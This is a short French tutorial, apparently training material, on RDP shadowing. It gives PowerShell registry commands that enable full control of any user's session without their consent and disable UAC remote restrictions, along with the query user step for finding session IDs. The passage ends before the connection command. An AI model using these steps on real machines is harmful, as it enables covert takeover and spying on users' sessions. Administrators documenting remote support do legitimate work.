RDP Shadowing
Avertissement
Cette documentation est destinée à un usage éducatif, et non à des fins mailveillantes.
Source : Alt4 Formation
Cette méthode permet de prendre le contrôle de n’importe quelle session utilisateur d’un serveur ou poste de travail.
1 - Création des clés de registre
Connectez-vous soit physiquement, soit à distance sur la machine cible avec un compte administrateur.
1.1 - Mode Shadow
Le mode Shadow permet la connexion à une session utilisateur sans déconnecter l’utilisateur cible.
New-ItemProperty -Name "Shadow" -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" -Type DWord -Value "4"
1.2 - Bypass de l’UAC
Si vous ne faites pas cette commande, il y a de grandes chances pour que la tentative de connexion soit refusée. Vous devez donc créer une autre clé de registre afin de bypasser cela.
New-ItemProperty -Name "LocalAccountTokenFilterPolicy" -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Type DWord -Value "2"
2 - Récupération de l’ID de session
Afin de vous connecter à la session de l’utilisateur, vous devez récupérer l’ID de session de l’utilisateur.
Sur le poste cible, toujours en tant qu’admin local, récupérez l’ID de session avec la commande query user :
query user
UTILISATEUR SESSION ID ÉTAT TEMPS INACT TEMPS SESSION
>jdupont console 1 Actif 3:57 01/01/1900 00:00
administrateur rdp-tcp#1 2 Actif 0:00 01/01/1900 00:00
3 - Connexion à la session cible
Il existe plusieurs modes de connexion :
- Affichage uniquement : vous visionnez la session de l’utilisateur sans pour autant pouvoir la contrôler
- Contrôle total : vous pouvez contrôler la session de l’utilisateur et donc agir à sa place
Dans notre cas, 192.168.1.104 correspond à la machine cible :